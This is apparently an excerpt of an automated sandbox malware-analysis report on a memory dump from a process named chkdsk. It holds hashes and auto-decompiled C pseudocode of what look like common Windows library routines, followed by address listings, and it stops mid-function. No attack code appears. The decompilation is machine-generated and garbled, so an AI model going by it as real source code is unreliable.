                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 885266447-0
                                                      • Opcode ID: c5d9a60a14487415e9574b8c28dc16aa389094dec99d756c7f1ddb2ae0315c0a
                                                      • Instruction ID: ae04e161015eca2f43455cd26c6494d4080ccb19234e7d68614ee901238bd301
                                                      • Opcode Fuzzy Hash: c5d9a60a14487415e9574b8c28dc16aa389094dec99d756c7f1ddb2ae0315c0a
                                                      • Instruction Fuzzy Hash: 78517671A08341CFC720DF69C480A2ABBE9FB88714F14896EEA8587354E771F855CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D8B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E04D8B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4e5f7a8);
				E04DDD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04DDD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04DCD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04DCF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04DDDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04DCB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04DCB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04DCE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04DCA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                      0x04d8b171
                                                      0x04d8b171
                                                      0x04d8b171
                                                      0x04d8b171
                                                      0x04d8b171
                                                      0x04d8b176
                                                      0x04d8b17b
                                                      0x04d8b180
                                                      0x04d8b186
                                                      0x04d8b18f
                                                      0x04d8b198
                                                      0x04d8b1a4
                                                      0x04d8b1aa
                                                      0x04de4802
                                                      0x04de4802
                                                      0x04de4805
                                                      0x04de480c
                                                      0x04de480e
                                                      0x04d8b1d1
                                                      0x04d8b1d3
                                                      0x04d8b1de
                                                      0x04d8b1de
                                                      0x04de4817
                                                      0x04de481e
                                                      0x04de4820
                                                      0x04de4822
                                                      0x04de4822
                                                      0x04de4824
                                                      0x04de4824
                                                      0x04de482a
                                                      0x00000000
                                                      0x00000000
                                                      0x04de4835
                                                      0x04de483a
                                                      0x04de483d
                                                      0x04de483f
                                                      0x04de4842
                                                      0x04de4842
                                                      0x04de4842
                                                      0x04de4846
                                                      0x04de484c
                                                      0x04de484e
                                                      0x04de4851
                                                      0x04de4851
                                                      0x04de4853
                                                      0x04de4854
                                                      0x04de4854
                                                      0x04de4858
                                                      0x04de485a
                                                      0x04de485a
                                                      0x04de485d
                                                      0x04de485f
                                                      0x04de4861
                                                      0x04de4861
                                                      0x04de4866
                                                      0x04de486b
                                                      0x04de486e
                                                      0x04de4871
                                                      0x04de4876
                                                      0x04de4876
                                                      0x04de4878
                                                      0x04de487b
                                                      0x04de4884
                                                      0x04de4884
                                                      0x00000000
                                                      0x04de487d
                                                      0x04de487d
                                                      0x04de4882
                                                      0x04de4889
                                                      0x04de4889
                                                      0x04de488f
                                                      0x04de4891
                                                      0x04de48e0
                                                      0x04de48e2
                                                      0x04de48e4
                                                      0x04de48e4
                                                      0x04de48e7
                                                      0x04de48e7
                                                      0x04de48ed
                                                      0x04de48f4
                                                      0x04de48f6
                                                      0x04de4951
                                                      0x04de4951
                                                      0x04de4953
                                                      0x04de4953
                                                      0x04de4956
                                                      0x04de4956
                                                      0x04de4958
                                                      0x04de4959
                                                      0x04de4959
                                                      0x04de495d
                                                      0x04de495d
                                                      0x04de495f
                                                      0x04de495f
                                                      0x04de4965
                                                      0x04de4969
                                                      0x04de49ba
                                                      0x04de49ba
                                                      0x04de49c1
                                                      0x04de49c5
                                                      0x04de49cc
                                                      0x04de49d4
                                                      0x04de49d7
                                                      0x04de49da
                                                      0x04de49e4
                                                      0x04de49e5
                                                      0x04de49f3
                                                      0x04de4a02
                                                      0x00000000
                                                      0x04de4a02
                                                      0x04de4972
                                                      0x04de4974
                                                      0x00000000
                                                      0x00000000
                                                      0x04de4976
                                                      0x04de4979
                                                      0x04de4982
                                                      0x04de4983
                                                      0x04de4984
                                                      0x04de498b
                                                      0x04de498d
                                                      0x04de4991
                                                      0x04de4993
                                                      0x04de4999
                                                      0x04de499d
                                                      0x04de49a2
                                                      0x04de49a2
                                                      0x04de49a2
                                                      0x04de4999
                                                      0x04de49ac
                                                      0x00000000
                                                      0x04de49b3
                                                      0x04de48f8
                                                      0x04de48fe
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04de48fe
                                                      0x04de4895
                                                      0x04de489c
                                                      0x04de48ad
                                                      0x04de48b2
                                                      0x04de48b5
                                                      0x04de48b7
                                                      0x04de48ba
                                                      0x04de48bc
                                                      0x04de48c6
                                                      0x04de48c6
                                                      0x04de48cb
                                                      0x04de48d1
                                                      0x04de48d4
                                                      0x04de48d8
                                                      0x04de48d8
                                                      0x00000000
                                                      0x04de48d8
                                                      0x04de48be
                                                      0x04de48c0
                                                      0x00000000
                                                      0x00000000
                                                      0x04de48c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04de48c4
                                                      0x00000000
                                                      0x04de4882
                                                      0x04de487b
                                                      0x04de4904
                                                      0x04de4906
                                                      0x00000000
                                                      0x00000000
                                                      0x04de4908
                                                      0x04de490e
                                                      0x00000000
                                                      0x00000000
                                                      0x04de4910
                                                      0x04de4917
                                                      0x04de4917
                                                      0x00000000
                                                      0x04de4917
                                                      0x04d8b1ba
                                                      0x04de47f9
                                                      0x04de47fc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04de47fc
                                                      0x04d8b1c0
                                                      0x04d8b1c0
                                                      0x04d8b1c3
                                                      0x04d8b1cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: _vswprintf_s
                                                      • String ID:
                                                      • API String ID: 677850445-0
                                                      • Opcode ID: 98b5aa61dae69f8eae4b7d4823ed07f85c0a02fabc297879093510e77403f6b7
                                                      • Instruction ID: ad737f443e8e1e2c2d83363b90c107a646b14fad3ed22ea9886dc308fba1fc75
                                                      • Opcode Fuzzy Hash: 98b5aa61dae69f8eae4b7d4823ed07f85c0a02fabc297879093510e77403f6b7
                                                      • Instruction Fuzzy Hash: 5D51E271E002598EEF35EF658884BBEBBB1FF05714F1041ADE859AB281D7346941DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D9D5E0 Relevance: 1.6, Strings: 1, Instructions: 353COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E04D9D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x4e7d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04D96600(0x4e752d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4e77b9c; // 0x0
							_t281 = L04DA4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E04DCF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4e77b90; // 0x775e0000
								if(_t384 == 0) {
									_t353 =  *0x4e77b8c; // 0x3029e0
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x302a90
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E04DA2280(_t200, 0x4e784d8);
									_t277 =  *0x4e785f4; // 0x303cf8
									_t351 =  *0x4e785f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x74c80000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x303d40
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x303c90
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x303d40
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x302ed0
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E04D9FFB0(_t287, _t353, 0x4e784d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E04DDCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04D96600(0x4e752d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04D97926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x4e7b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E04E0E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4e78472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x4e7b218; // 0x0
														asm("ror edi, cl");
														 *0x4e7b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04DA2280(_t250, 0x4e784d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04DC3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E04D9FFB0(_t293, _t353, 0x4e784d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E04DC37F5(_t353, 0);
																}
																E04DC0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04DB9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E04DB02D6(_t174);
																}
																L04DA77F0( *0x4e77b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E04DBC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L04D9EC7F(_t353);
										L04DB19B8(_t287, 0, _t353, 0);
										_t200 = E04D8F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E04DCB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x4e7b2f8; // 0x790000
									if((_t206 |  *0x4e7b2fc) == 0 || ( *0x4e7b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x4e7b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04E36B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04E36AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E04D9E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L04D9EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04DC9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E04D9E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04D98F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04DC3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
